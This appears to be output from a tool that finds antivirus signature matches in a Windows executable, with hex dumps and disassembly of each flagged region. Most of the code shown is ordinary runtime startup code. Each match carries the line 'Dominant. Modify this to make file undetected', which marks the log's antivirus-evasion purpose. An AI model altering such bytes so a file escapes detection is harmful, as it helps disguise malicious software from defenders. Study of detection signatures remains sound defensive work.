0xc8f: 0x0040188f 8bf8 mov edi, eax
0xc91: 0x00401891 e876420000 call fcn.00405b0c
0xc96: 0x00401896 8b30 mov esi, dword [eax]
0xc98: 0x00401898 e869420000 call fcn.00405b06
0xc9d: 0x0040189d 57 push edi
0xc9e: 0x0040189e 56 push esi ; char **envp
0xc9f: 0x0040189f ff30 push dword [eax] ; char **argv
0xca1: 0x004018a1 e8daf9ffff call main ; int main(char **argv, char **envp)
0xca6: 0x004018a6 83c40c add esp, 0xc
0xca9: 0x004018a9 8bf0 mov esi, eax
0xcab: 0x004018ab e82e060000 call fcn.00401ede
0xcb0: 0x004018b0 84c0 test al, al
0xcb2: < 0x004018b2 746b je 0x40191f
0xcb4: 0x004018b4 84db test bl, bl
0xcb6: < 0x004018b6 7505 jne 0x4018bd
0xcb8: 0x004018b8 e892410000 call fcn.00405a4f
0xcbd: ; CODE XREF from entry0 @ 0x4018b6(x)
0xcbd: > 0x004018bd 6a00 push 0 ; uint32_t arg_ch
0xcbf: 0x004018bf 6a01 push 1 ; 1 ; int32_t arg_8h
0xcc1: 0x004018c1 e8 invalid
0xcc2: 0x004018c2 7b invalid

Match 4: 3370 (size: 17)

Dominant. Modify this to make file undetected

.text

00000D2A   41 00 00 CC E8 C5 03 00 00 E9 74 FE FF FF 55 8B    A.........t...U.
00000D3A   EC                                                 .

0xd1a: 0x0040191a e89f040000 call fcn.00401dbe
0xd1f: ; CODE XREF from entry0 @ 0x4018b2(x)
0xd1f: 0x0040191f 56 push esi ; int32_t arg_8h
0xd20: 0x00401920 e875410000 call fcn.00405a9a
0xd25: ; CODE XREF from fcn.004016d9 @ +0x218(x)
0xd25: 0x00401925 ff75e0 push dword [var_20h] ; int32_t arg_8h
0xd28: 0x00401928 e831410000 call fcn.00405a5e
0xd2d: 0x0040192d cc int3
0xd2e: ;-- eip:
0xd2e: 343: entry0 ();
0xd2e: ; var int32_t var_4h @ ebp-0x4
0xd2e: ; var int32_t var_10h @ ebp-0x10
0xd2e: ; var int32_t var_19h @ ebp-0x19
0xd2e: ; var int32_t var_20h @ ebp-0x20
0xd2e: ; var int32_t var_24h @ ebp-0x24
0xd2e: 0x0040192e e8c5030000 call fcn.00401cf8
0xd33: < 0x00401933 e974feffff jmp 0x4017ac
0xd38: ; CALL XREF from fcn.004016d9 @ 0x401a53(x)
0xd38: 40: fcn.00401938 (struct _EXCEPTION_POINTERS *ExceptionInfo);
0xd38: ; arg struct _EXCEPTION_POINTERS *ExceptionInfo @ ebp+0x8
0xd38: 0x00401938 55 push ebp
0xd39: 0x00401939 8bec mov ebp, esp
0xd3b: 0x0040193b 6a00 push 0 ; LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter
0xd3d: 0x0040193d ff1510204100 call dword [sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter] ; 0x412010 ; LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter)
0xd43: 0x00401943 ff7508 push dword [ExceptionInfo] ; struct _EXCEPTION_POINTERS *ExceptionInfo
0xd46: 0x00401946 ff invalid
0xd47: 0x00401947 15 invalid
0xd48: 0x00401948 0c20 or al, 0x20 ; 32
0xd4a: 0x0040194a 41 inc ecx

Match 5: 3727 (size: 34)

Dominant. Modify this to make file undetected

.text

00000E8F   C2 28 3B D6 75 EA 33 C0 5E 5D C3 8B C2 EB F9 56    .(;.u.3.^].....V
00000E9F   E8 62 07 00 00 85 C0 74 20 64 A1 18 00 00 00 BE    .b.....t d......
00000EAF   E0 AB                                              ..

0xe7f: ; CODE XREF from fcn.00401a5a @ 0x401a93(x)
0xe7f: > 0x00401a7f 3b4a0c cmp ecx, dword [edx + 0xc]
0xe82: < 0x00401a82 720a jb 0x401a8e
0xe84: 0x00401a84 8b4208 mov eax, dword [edx + 8]
0xe87: 0x00401a87 03420c add eax, dword [edx + 0xc]
0xe8a: 0x00401a8a 3bc8 cmp ecx, eax
0xe8c: < 0x00401a8c 720c jb 0x401a9a
0xe8e: ; CODE XREF from fcn.00401a5a @ 0x401a82(x)
0xe8e: > 0x00401a8e 83c228 add edx, 0x28 ; 40
0xe91: 0x00401a91 3bd6 cmp edx, esi
0xe93: < 0x00401a93 75ea jne 0x401a7f
0xe95: ; CODE XREF from fcn.00401a5a @ 0x401a7a(x)
0xe95: > 0x00401a95 33c0 xor eax, eax
0xe97: ; CODE XREF from fcn.00401a5a @ 0x401a9c(x)
0xe97: > 0x00401a97 5e pop esi
0xe98: 0x00401a98 5d pop ebp
0xe99: 0x00401a99 c3 ret
0xe9a: ; CODE XREF from fcn.00401a5a @ 0x401a8c(x)
0xe9a: > 0x00401a9a 8bc2 mov eax, edx
0xe9c: < 0x00401a9c ebf9 jmp 0x401a97
0xe9e: ; CALL XREF from entry0 @ 0x4017d1(x)
0xe9e: 50: fcn.00401a9e ();
0xe9e: 0x00401a9e 56 push esi
0xe9f: 0x00401a9f e862070000 call fcn.00402206
0xea4: 0x00401aa4 85c0 test eax, eax
0xea6: < 0x00401aa6 7420 je 0x401ac8
0xea8: 0x00401aa8 64a118000000 mov eax, dword fs:[0x18]
0xeae: 0x00401aae bee0ab4100 mov esi, 0x41abe0
0xeb3: 0x00401ab3 8b5004 mov edx, dword [eax + 4]
0xeb6: < 0x00401ab6 eb04 jmp 0x401abc
0xeb8: ; CODE XREF from fcn.00401a9e @ 0x401ac6(x)
0xeb8: 0x00401ab8 3bd0 cmp edx, eax
0xeba: < 0x00401aba 7410 je 0x401acc
0xebc: ; CODE XREF from fcn.00401a9e @ 0x401ab6(x)
0xebc: > 0x00401abc 33c0 xor eax, eax
0xebe: 0x00401abe 8bca mov ecx, edx
0xec0: 0x00401ac0 f0 invalid

Match 6: 3778 (size: 17)

Dominant. Modify this to make file undetected

.text

00000EC2   B1 0E 85 C0 75 F0 32 C0 5E C3 B0 01 5E C3 55 8B    ....u.2.^...^.U.
00000ED2   EC                                                 .

0xeb3: 0x00401ab3 8b5004 mov edx, dword [eax + 4]
0xeb6: < 0x00401ab6 eb04 jmp 0x401abc
0xeb8: ; CODE XREF from fcn.00401a9e @ 0x401ac6(x)
0xeb8: > 0x00401ab8 3bd0 cmp edx, eax
0xeba: < 0x00401aba 7410 je 0x401acc
0xebc: ; CODE XREF from fcn.00401a9e @ 0x401ab6(x)
0xebc: > 0x00401abc 33c0 xor eax, eax
0xebe: 0x00401abe 8bca mov ecx, edx
0xec0: 0x00401ac0 f00fb10e lock cmpxchg dword [esi], ecx
0xec4: 0x00401ac4 85c0 test eax, eax
0xec6: < 0x00401ac6 75f0 jne 0x401ab8
0xec8: ; CODE XREF from fcn.00401a9e @ 0x401aa6(x)
0xec8: > 0x00401ac8 32c0 xor al, al
0xeca: 0x00401aca 5e pop esi
0xecb: 0x00401acb c3 ret
0xecc: ; CODE XREF from fcn.00401a9e @ 0x401aba(x)
0xecc: > 0x00401acc b001 mov al, 1
0xece: 0x00401ace 5e pop esi
0xecf: 0x00401acf c3 ret
0xed0: ; CALL XREF from entry0 @ 0x4017ba(x)
0xed0: 57: fcn.00401ad0 (uint32_t arg_8h);
0xed0: ; arg uint32_t arg_8h @ ebp+0x8
0xed0: 0x00401ad0 55 push ebp
0xed1: 0x00401ad1 8bec mov ebp, esp
0xed3: 0x00401ad3 837d0800 cmp dword [arg_8h], 0
0xed7: < 0x00401ad7 7507 jne 0x401ae0
0xed9: 0x00401ad9 c605e4ab4100. mov byte [0x41abe4], 1 ; [0x41abe4:1]=0
0xee0: ; CODE XREF from fcn.00401ad0 @ 0x401ad7(x)
0xee0: > 0x00401ae0 e8 invalid
0xee1: 0x00401ae1 50 push eax
0xee2: 0x00401ae2 05 invalid

Match 7: 3812 (size: 85)

Dominant. Modify this to make file undetected

.text

00000EE4   00 E8 D4 08 00 00 84 C0 75 04 32 C0 5D C3 E8 AC    ........u.2.]...
00000EF4   45 00 00 84 C0 75 0A 6A 00 E8 DB 08 00 00 59 EB    E....u.j......Y.
00000F04   E9 B0 01 5D C3 55 8B EC 80 3D E5 AB 41 00 00 74    ...].U...=..A..t
00000F14   04 B0 01 5D C3 56 8B 75 08 85 F6 74 05 83 FE 01    ...].V.u...t....
00000F24   75 62 E8 DB 06 00 00 85 C0 74 26 85 F6 75 22 68    ub.......t&..u"h
00000F34   E8 AB 41 00 E8                                     ..A..

0xed7: < 0x00401ad7 7507 jne 0x401ae0
0xed9: 0x00401ad9 c605e4ab4100. mov byte [0x41abe4], 1 ; [0x41abe4:1]=0
0xee0: ; CODE XREF from fcn.00401ad0 @ 0x401ad7(x)
0xee0: > 0x00401ae0 e850050000 call fcn.00402035
0xee5: 0x00401ae5 e8d4080000 call fcn.004023be
0xeea: 0x00401aea 84c0 test al, al
0xeec: < 0x00401aec 7504 jne 0x401af2
0xeee: ; CODE XREF from fcn.00401ad0 @ 0x401b03(x)
0xeee: > 0x00401aee 32c0 xor al, al
0xef0: 0x00401af0 5d pop ebp
0xef1: 0x00401af1 c3 ret
0xef2: ; CODE XREF from fcn.00401ad0 @ 0x401aec(x)
0xef2: > 0x00401af2 e8ac450000 call fcn.004060a3
0xef7: 0x00401af7 84c0 test al, al
0xef9: < 0x00401af9 750a jne 0x401b05
0xefb: 0x00401afb 6a00 push 0 ; uint32_t arg_8h
0xefd: 0x00401afd e8db080000 call fcn.004023dd
0xf02: 0x00401b02 59 pop ecx
0xf03: < 0x00401b03 ebe9 jmp 0x401aee
0xf05: ; CODE XREF from fcn.00401ad0 @ 0x401af9(x)
0xf05: > 0x00401b05 b001 mov al, 1
0xf07: 0x00401b07 5d pop ebp
0xf08: 0x00401b08 c3 ret
0xf09: ; CALL XREF from fcn.004016d9 @ +0x31(x)
0xf09: 135: fcn.00401b09 (int32_t arg_8h);
0xf09: ; arg int32_t arg_8h @ ebp+0x8
0xf09: 0x00401b09 55 push ebp
0xf0a: 0x00401b0a 8bec mov ebp, esp
0xf0c: 0x00401b0c 803de5ab4100. cmp byte [0x41abe5], 0 ; [0x41abe5:1]=0
0xf13: < 0x00401b13 7404 je 0x401b19
0xf15: 0x00401b15 b001 mov al, 1
0xf17: 0x00401b17 5d pop ebp
0xf18: 0x00401b18 c3 ret
0xf19: ; CODE XREF from fcn.00401b09 @ 0x401b13(x)
0xf19: > 0x00401b19 56 push esi
0xf1a: 0x00401b1a 8b7508 mov esi, dword [arg_8h]
0xf1d: 0x00401b1d 85f6 test esi, esi
0xf1f: < 0x00401b1f 7405 je 0x401b26
0xf21: 0x00401b21 83fe01 cmp esi, 1 ; 1
0xf24: < 0x00401b24 7562 jne 0x401b88
0xf26: ; CODE XREF from fcn.00401b09 @ 0x401b1f(x)
0xf26: > 0x00401b26 e8db060000 call fcn.00402206
0xf2b: 0x00401b2b 85c0 test eax, eax
0xf2d: < 0x00401b2d 7426 je 0x401b55
0xf2f: 0x00401b2f 85f6 test esi, esi
0xf31: < 0x00401b31 7522 jne 0x401b55
0xf33: 0x00401b33 68e8ab4100 push 0x41abe8 ; int32_t arg_8h
0xf38: 0x00401b38 e80f440000 call fcn.00405f4c
0xf3d: 0x00401b3d 59 pop ecx
0xf3e: 0x00401b3e 85c0 test eax, eax
0xf40: < 0x00401b40 750f jne 0x401b51
0xf42: 0x00401b42 68f4ab4100 push 0x41abf4 ; int32_t arg_8h
0xf47: 0x00401b47 e8 invalid
0xf48: 0x00401b48 00 invalid

Match 8: 3914 (size: 68)

Dominant. Modify this to make file undetected

.text

00000F4A   00 00 59 85 C0 74 2B 32 C0 EB 30 83 C9 FF 89 0D    ..Y..t+2..0.....
00000F5A   E8 AB 41 00 89 0D EC AB 41 00 89 0D F0 AB 41 00    ..A.....A.....A.
00000F6A   89 0D F4 AB 41 00 89 0D F8 AB 41 00 89 0D FC AB    ....A.....A.....
00000F7A   41 00 C6 05 E5 AB 41 00 01 B0 01 5E 5D C3 6A 05    A.....A....^].j.
00000F8A   E8 2F 02 00                                        ./..

0xf3d: 0x00401b3d 59 pop ecx
0xf3e: 0x00401b3e 85c0 test eax, eax
0xf40: < 0x00401b40 750f jne 0x401b51
0xf42: 0x00401b42 68f4ab4100 push 0x41abf4 ; int32_t arg_8h
0xf47: 0x00401b47 e800440000 call fcn.00405f4c
0xf4c: 0x00401b4c 59 pop ecx
0xf4d: 0x00401b4d 85c0 test eax, eax
0xf4f: < 0x00401b4f 742b je 0x401b7c
0xf51: ; CODE XREF from fcn.00401b09 @ 0x401b40(x)
0xf51: > 0x00401b51 32c0 xor al, al
0xf53: < 0x00401b53 eb30 jmp 0x401b85
0xf55: ; CODE XREFS from fcn.00401b09 @ 0x401b2d(x), 0x401b31(x)
0xf55: > 0x00401b55 83c9ff or ecx, 0xffffffff ; -1
0xf58: 0x00401b58 890de8ab4100 mov dword [0x41abe8], ecx ; [0x41abe8:4]=0
0xf5e: 0x00401b5e 890decab4100 mov dword [0x41abec], ecx ; [0x41abec:4]=0
0xf64: 0x00401b64 890df0ab4100 mov dword [0x41abf0], ecx ; [0x41abf0:4]=0
0xf6a: 0x00401b6a 890df4ab4100 mov dword [0x41abf4], ecx ; [0x41abf4:4]=0
0xf70: 0x00401b70 890df8ab4100 mov dword [0x41abf8], ecx ; [0x41abf8:4]=0
0xf76: 0x00401b76 890dfcab4100 mov dword [0x41abfc], ecx ; [0x41abfc:4]=0
0xf7c: ; CODE XREF from fcn.00401b09 @ 0x401b4f(x)
0xf7c: > 0x00401b7c c605e5ab4100. mov byte [0x41abe5], 1 ; [0x41abe5:1]=0
0xf83: 0x00401b83 b001 mov al, 1
0xf85: ; CODE XREF from fcn.00401b09 @ 0x401b53(x)
0xf85: > 0x00401b85 5e pop esi
0xf86: 0x00401b86 5d pop ebp
0xf87: 0x00401b87 c3 ret
0xf88: ; CODE XREF from fcn.00401b09 @ 0x401b24(x)
0xf88: > 0x00401b88 6a05 push 5 ; 5 ; int32_t arg_4h
0xf8a: 0x00401b8a e82f020000 call fcn.00401dbe
0xf8f: 0x00401b8f cc int3
0xf90: ; CALL XREFS from entry0 @ 0x401852(x), 0x401878(x)
0xf90: 126: fcn.00401b90 (int32_t arg_8h);
0xf90: ; arg int32_t arg_8h @ ebp+0x8
0xf90: ; var int32_t var_4h @ ebp-0x4
0xf90: ; var int32_t var_10h @ ebp-0x10
0xf90: 0x00401b90 6a08 push 8 ; 8
0xf92: 0x00401b92 68288f4100 push 0x418f28
0xf97: 0x00401b97 e854040000 call fcn.00401ff0
0xf9c: 0x00401b9c 83 invalid
0xf9d: 0x00401b9d 65 invalid

Match 9: 4118 (size: 51)

Dominant. Modify this to make file undetected

.text

00001016   F0 64 89 0D 00 00 00 00 59 5F 5E 5B C9 C3 55 8B    .d......Y_^[..U.
00001026   EC E8 DA 05 00 00 85 C0 74 0F 80 7D 08 00 75 09    ........t..}..u.
00001036   33 C0 B9 E0 AB 41 00 87 01 5D C3 55 8B EC 80 3D    3....A...].U...=
00001046   E4 AB 41                                           ..A

0x1007: 0x00401c07 c3 ret
0x1008: 0x00401c08 8b65e8 mov esp, dword [ebp - 0x18]
0x100b: ; CODE XREFS from fcn.00401b90 @ 0x401bac(x), 0x401bbd(x), 0x401bcb(x), 0x401be2(x), 0x401be8(x)
0x100b: > 0x00401c0b c745fcfeffff. mov dword [var_4h], 0xfffffffe ; 4294967294
0x1012: 0x00401c12 32c0 xor al, al
0x1014: ; CODE XREF from fcn.00401b90 @ 0x401bf3(x)
0x1014: > 0x00401c14 8b4df0 mov ecx, dword [var_10h]
0x1017: 0x00401c17 64890d000000. mov dword fs:[0], ecx
0x101e: 0x00401c1e 59 pop ecx
0x101f: 0x00401c1f 5f pop edi
0x1020: 0x00401c20 5e pop esi
0x1021: 0x00401c21 5b pop ebx
0x1022: 0x00401c22 c9 leave
0x1023: 0x00401c23 c3 ret
0x1024: ; CALL XREF from entry0 @ 0x40183e(x)
0x1024: 29: fcn.00401c24 (uint32_t arg_8h);
0x1024: ; arg uint32_t arg_8h @ ebp+0x8
0x1024: 0x00401c24 55 push ebp
0x1025: 0x00401c25 8bec mov ebp, esp
0x1027: 0x00401c27 e8da050000 call fcn.00402206
0x102c: 0x00401c2c 85c0 test eax, eax
0x102e: < 0x00401c2e 740f je 0x401c3f
0x1030: 0x00401c30 807d0800 cmp byte [arg_8h], 0
0x1034: < 0x00401c34 7509 jne 0x401c3f
0x1036: 0x00401c36 33c0 xor eax, eax
0x1038: 0x00401c38 b9e0ab4100 mov ecx, 0x41abe0
0x103d: 0x00401c3d 8701 xchg dword [ecx], eax
0x103f: ; CODE XREFS from fcn.00401c24 @ 0x401c2e(x), 0x401c34(x)
0x103f: > 0x00401c3f 5d pop ebp
0x1040: 0x00401c40 c3 ret
0x1041: ; CALL XREF from entry0 @ 0x4018c1(x)
0x1041: 40: fcn.00401c41 (int32_t arg_8h, uint32_t arg_ch);
0x1041: ; arg int32_t arg_8h @ ebp+0x8
0x1041: ; arg uint32_t arg_ch @ ebp+0xc
0x1041: 0x00401c41 55 push ebp
0x1042: 0x00401c42 8bec mov ebp, esp
0x1044: 0x00401c44 803de4ab4100. cmp byte [0x41abe4], 0 ; [0x41abe4:1]=0
0x104b: < 0x00401c4b 7406 je 0x401c53
0x104d: 0x00401c4d 807d0c00 cmp byte [arg_ch], 0
0x1051: < 0x00401c51 7512 jne 0x401c65
0x1053: ; CODE XREF from fcn.00401c41 @ 0x401c4b(x)
0x1053: > 0x00401c53 ff7508 push dword [arg_8h] ; uint32_t arg_8h
0x1056: 0x00401c56 e8 invalid
0x1057: 0x00401c57 5a pop edx
0x1058: 0x00401c58 44 inc esp

Match 10: 4186 (size: 136)

Dominant. Modify this to make file undetected

.text

0000105A   00 FF 75 08 E8 7A 07 00 00 59 59 B0 01 5D C3 55    ..u..z...YY..].U
0000106A   8B EC 83 3D E8 AB 41 00 FF FF 75 08 75 07 E8 8C    ...=..A...u.u...
0000107A   42 00 00 EB 0B 68 E8 AB 41 00 E8 EC 42 00 00 59    B....h..A...B..Y
0000108A   F7 D8 59 1B C0 F7 D0 23 45 08 5D C3 55 8B EC FF    ..Y....#E.].U...
0000109A   75 08 E8 C8 FF FF FF F7 D8 59 1B C0 F7 D8 48 5D    u........Y....H]
000010AA   C3 55 8B EC 83 EC 14 83 65 F4 00 8D 45 F4 83 65    .U......e...E..e
000010BA   F8 00 50 FF 15 2C 20 41 00 8B 45 F8 33 45 F4 89    ..P.., A..E.3E..
000010CA   45 FC FF 15 28 20 41 00 31 45 FC FF 15 24 20 41    E...( A.1E...$ A
000010DA   00 31 45 FC 8D 45 EC 50                            .1E..E.P

0x104b: < 0x00401c4b 7406 je 0x401c53
0x104d: 0x00401c4d 807d0c00 cmp byte [arg_ch], 0
0x1051: < 0x00401c51 7512 jne 0x401c65
0x1053: ; CODE XREF from fcn.00401c41 @ 0x401c4b(x)
0x1053: > 0x00401c53 ff7508 push dword [arg_8h] ; uint32_t arg_8h
0x1056: 0x00401c56 e85a440000 call fcn.004060b5
0x105b: 0x00401c5b ff7508 push dword [arg_8h] ; uint32_t arg_8h
0x105e: 0x00401c5e e87a070000 call fcn.004023dd
0x1063: 0x00401c63 59 pop ecx
0x1064: 0x00401c64 59 pop ecx
0x1065: ; CODE XREF from fcn.00401c41 @ 0x401c51(x)
0x1065: > 0x00401c65 b001 mov al, 1
0x1067: 0x00401c67 5d pop ebp
0x1068: 0x00401c68 c3 ret
0x1069: ; CALL XREF from fcn.00401c96 @ 0x401c9c(x)
0x1069: 45: fcn.00401c69 (int32_t arg_8h);
0x1069: ; arg int32_t arg_8h @ ebp+0x8
0x1069: 0x00401c69 55 push ebp
0x106a: 0x00401c6a 8bec mov ebp, esp
0x106c: 0x00401c6c 833de8ab4100. cmp dword [0x41abe8], 0xffffffff ; [0x41abe8:4]=0
0x1073: 0x00401c73 ff7508 push dword [arg_8h]
0x1076: < 0x00401c76 7507 jne 0x401c7f
0x1078: 0x00401c78 e88c420000 call fcn.00405f09
0x107d: < 0x00401c7d eb0b jmp 0x401c8a
0x107f: ; CODE XREF from fcn.00401c69 @ 0x401c76(x)
0x107f: > 0x00401c7f 68e8ab4100 push 0x41abe8 ; int32_t arg_8h
0x1084: 0x00401c84 e8ec420000 call fcn.00405f75
0x1089: 0x00401c89 59 pop ecx
0x108a: ; CODE XREF from fcn.00401c69 @ 0x401c7d(x)
0x108a: > 0x00401c8a f7d8 neg eax
0x108c: 0x00401c8c 59 pop ecx
0x108d: 0x00401c8d 1bc0 sbb eax, eax
0x108f: 0x00401c8f f7d0 not eax
0x1091: 0x00401c91 234508 and eax, dword [arg_8h]
0x1094: 0x00401c94 5d pop ebp
0x1095: 0x00401c95 c3 ret
0x1096: ; CALL XREF from fcn.004016d9 @ +0x4a(x)
0x1096: 21: fcn.00401c96 (int32_t arg_8h);
0x1096: ; arg int32_t arg_8h @ ebp+0x8
0x1096: 0x00401c96 55 push ebp
0x1097: 0x00401c97 8bec mov ebp, esp
0x1099: 0x00401c99 ff7508 push dword [arg_8h] ; int32_t arg_8h
0x109c: 0x00401c9c e8c8ffffff call fcn.00401c69
0x10a1: 0x00401ca1 f7d8 neg eax
0x10a3: 0x00401ca3 59 pop ecx
0x10a4: 0x00401ca4 1bc0 sbb eax, eax
0x10a6: 0x00401ca6 f7d8 neg eax
0x10a8: 0x00401ca8 48 dec eax
0x10a9: 0x00401ca9 5d pop ebp
0x10aa: 0x00401caa c3 ret
0x10ab: ; CALL XREF from fcn.00401cf8 @ 0x401d12(x)
0x10ab: 77: fcn.00401cab ();
0x10ab: ; var int32_t var_4h @ ebp-0x4
0x10ab: ; var int32_t var_8h @ ebp-0x8
0x10ab: ; var LPFILETIME lpSystemTimeAsFileTime @ ebp-0xc
0x10ab: ; var int32_t var_10h @ ebp-0x10
0x10ab: ; var LARGE_INTEGER *lpPerformanceCount @ ebp-0x14
0x10ab: 0x00401cab 55 push ebp
0x10ac: 0x00401cac 8bec mov ebp, esp
0x10ae: 0x00401cae 83ec14 sub esp, 0x14
0x10b1: 0x00401cb1 8365f400 and dword [lpSystemTimeAsFileTime], 0
0x10b5: 0x00401cb5 8d45f4 lea eax, [lpSystemTimeAsFileTime]
0x10b8: 0x00401cb8 8365f800 and dword [var_8h], 0
0x10bc: 0x00401cbc 50 push eax ; LPFILETIME lpSystemTimeAsFileTime
0x10bd: 0x00401cbd ff152c204100 call dword [sym.imp.KERNEL32.dll_GetSystemTimeAsFileTime] ; 0x41202c ; VOID GetSystemTimeAsFileTime(LPFILETIME lpSystemTimeAsFileTime)
0x10c3: 0x00401cc3 8b45f8 mov eax, dword [var_8h]
0x10c6: 0x00401cc6 3345f4 xor eax, dword [lpSystemTimeAsFileTime]
0x10c9: 0x00401cc9 8945fc mov dword [var_4h], eax
0x10cc: 0x00401ccc ff1528204100 call dword [sym.imp.KERNEL32.dll_GetCurrentThreadId] ; 0x412028 ; "z\x95\x01" ; DWORD GetCurrentThreadId(void)
0x10d2: 0x00401cd2 3145fc xor dword [var_4h], eax
0x10d5: 0x00401cd5 ff1524204100 call dword [sym.imp.KERNEL32.dll_GetCurrentProcessId] ; 0x412024 ; "d\x95\x01" ; DWORD GetCurrentProcessId(void)
0x10db: 0x00401cdb 3145fc xor dword [var_4h], eax
0x10de: 0x00401cde 8d45ec lea eax, [lpPerformanceCount]
0x10e1: 0x00401ce1 50 push eax ; LARGE_INTEGER *lpPerformanceCount
0x10e2: 0x00401ce2 ff1520204100 call dword [sym.imp.KERNEL32.dll_QueryPerformanceCounter] ; 0x412020 ; "J\x95\x01" ; BOOL QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount)
0x10e8: 0x00401ce8 8b45f0 mov eax, dword [var_10h]
0x10eb: 0x00401ceb 8d4dfc lea ecx, [var_4h]
0x10ee: 0x00401cee 3345ec xor eax, dword [lpPerformanceCount]
0x10f1: 0x00401cf1 33 invalid

Match 11: 4339 (size: 204)

Dominant. Modify this to make file undetected

.text

000010F3   FC 33 C1 C9 C3 8B 0D 04 A0 41 00 56 57 BF 4E E6    .3.......A.VW.N.
00001103   40 BB BE 00 00 FF FF 3B CF 74 04 85 CE 75 26 E8    @......;.t...u&.
00001113   94 FF FF FF 8B C8 3B CF 75 07 B9 4F E6 40 BB EB    ......;.u..O.@..
00001123   0E 85 CE 75 0A 0D 11 47 00 00 C1 E0 10 0B C8 89    ...u...G........
00001133   0D 04 A0 41 00 F7 D1 5F 89 0D 00 A0 41 00 5E C3    ...A..._....A.^.
00001143   33 C0 C3 33 C0 40 C3 B8 00 40 00 00 C3 68 00 AC    3..3.@...@...h..
00001153   41 00 FF 15 30 20 41 00 C3 B0 01 C3 68 00 00 03    A...0 A.....h...
00001163   00 68 00 00 01 00 6A 00 E8 75 43 00 00 83 C4 0C    .h....j..uC.....
00001173   85 C0 75 01 C3 6A 07 E8 3F 00 00 00 CC C2 00 00    ..u..j..?.......
00001183   B8 08 AC 41 00 C3 E8 22 F4 FF FF 8B 48 04 83 08    ...A..."....H...
00001193   24 89 48 04 E8 E7 FF FF FF 8B 48 04 83 08 02 89    $.H.......H.....
000011A3   48 04 C3 33 C0 39 05 0C A0 41 00 0F 94 C0 C3 B8    H..3.9...A......
000011B3   F0 B3 41 00 C3 B8 EC B3 41 00 C3 55                ..A.....A..U

0x10e8: 0x00401ce8 8b45f0 mov eax, dword [var_10h]
0x10eb: 0x00401ceb 8d4dfc lea ecx, [var_4h]
0x10ee: 0x00401cee 3345ec xor eax, dword [lpPerformanceCount]
0x10f1: 0x00401cf1 3345fc xor eax, dword [var_4h]
0x10f4: 0x00401cf4 33c1 xor eax, ecx
0x10f6: 0x00401cf6 c9 leave
0x10f7: 0x00401cf7 c3 ret
0x10f8: ; CALL XREF from entry0 @ 0x40192e(x)
0x10f8: 75: fcn.00401cf8 ();
0x10f8: 0x00401cf8 8b0d04a04100 mov ecx, dword [0x41a004] ; [0x41a004:4]=0xbb40e64e
0x10fe: 0x00401cfe 56 push esi
0x10ff: 0x00401cff 57 push edi
0x1100: 0x00401d00 bf4ee640bb mov edi, 0xbb40e64e
0x1105: 0x00401d05 be0000ffff mov esi, 0xffff0000
0x110a: 0x00401d0a 3bcf cmp ecx, edi
0x110c: < 0x00401d0c 7404 je 0x401d12
0x110e: 0x00401d0e 85ce test esi, ecx
0x1110: < 0x00401d10 7526 jne 0x401d38
0x1112: ; CODE XREF from fcn.00401cf8 @ 0x401d0c(x)
0x1112: > 0x00401d12 e894ffffff call fcn.00401cab
0x1117: 0x00401d17 8bc8 mov ecx, eax
0x1119: 0x00401d19 3bcf cmp ecx, edi
0x111b: < 0x00401d1b 7507 jne 0x401d24
0x111d: 0x00401d1d b94fe640bb mov ecx, 0xbb40e64f
0x1122: < 0x00401d22 eb0e jmp 0x401d32
0x1124: ; CODE XREF from fcn.00401cf8 @ 0x401d1b(x)
0x1124: > 0x00401d24 85ce test esi, ecx
0x1126: < 0x00401d26 750a jne 0x401d32
0x1128: 0x00401d28 0d11470000 or eax, 0x4711
0x112d: 0x00401d2d c1e010 shl eax, 0x10
0x1130: 0x00401d30 0bc8 or ecx, eax
0x1132: ; CODE XREFS from fcn.00401cf8 @ 0x401d22(x), 0x401d26(x)
0x1132: > 0x00401d32 890d04a04100 mov dword [0x41a004], ecx ; [0x41a004:4]=0xbb40e64e
0x1138: ; CODE XREF from fcn.00401cf8 @ 0x401d10(x)
0x1138: > 0x00401d38 f7d1 not ecx
0x113a: 0x00401d3a 5f pop edi
0x113b: 0x00401d3b 890d00a04100 mov dword [section..data], ecx ; [0x41a000:4]=0x44bf19b1
0x1141: 0x00401d41 5e pop esi
0x1142: 0x00401d42 c3 ret
0x1143: ; XREFS: CALL 0x004016fa DATA 0x00401747 CALL 0x00401761
0x1143: ; XREFS: CALL 0x0040177b CALL 0x0040179f CODE 0x00401ed9
0x1143: 3: fcn.00401d43 ();
0x1143: 0x00401d43 33c0 xor eax, eax
0x1145: 0x00401d45 c3 ret
0x1146: ; CALL XREF from fcn.004016d9 @ +0x4f(x)
0x1146: 4: fcn.00401d46 ();
0x1146: 0x00401d46 33c0 xor eax, eax
0x1148: 0x00401d48 40 inc eax
0x1149: 0x00401d49 c3 ret
0x114a: ; CALL XREF from fcn.004016d9 @ +0x16(x)
0x114a: 6: fcn.00401d4a ();
0x114a: 0x00401d4a b800400000 mov eax, 0x4000
0x114f: 0x00401d4f c3 ret
0x1150: ; CALL XREF from fcn.004016d9 @ +0x60(x)
0x1150: 12: fcn.00401d50 ();
0x1150: 0x00401d50 6800ac4100 push 0x41ac00 ; PSLIST_HEADER ListHead
0x1155: 0x00401d55 ff1530204100 call dword [sym.imp.KERNEL32.dll_InitializeSListHead] ; 0x412030 ; VOID InitializeSListHead(PSLIST_HEADER ListHead)
0x115b: 0x00401d5b c3 ret
0x115c: ; CALL XREF from fcn.004016d9 @ +0x94(x)
0x115c: 3: fcn.00401d5c ();
0x115c: 0x00401d5c b001 mov al, 1
0x115e: 0x00401d5e c3 ret
0x115f: ; CALL XREF from fcn.004016d9 @ +0x83(x)
0x115f: 33: fcn.00401d5f ();
0x115f: 0x00401d5f 6800000300 push 0x30000
0x1164: 0x00401d64 6800000100 push 0x10000
0x1169: 0x00401d69 6a00 push 0 ; int32_t arg_8h
0x116b: 0x00401d6b e875430000 call fcn.004060e5
0x1170: 0x00401d70 83c40c add esp, 0xc
0x1173: 0x00401d73 85c0 test eax, eax
0x1175: < 0x00401d75 7501 jne 0x401d78
0x1177: 0x00401d77 c3 ret
0x1178: ; CODE XREF from fcn.00401d5f @ 0x401d75(x)
0x1178: > 0x00401d78 6a07 push 7 ; 7
0x117a: 0x00401d7a e83f000000 call fcn.00401dbe
0x117f: 0x00401d7f cc int3
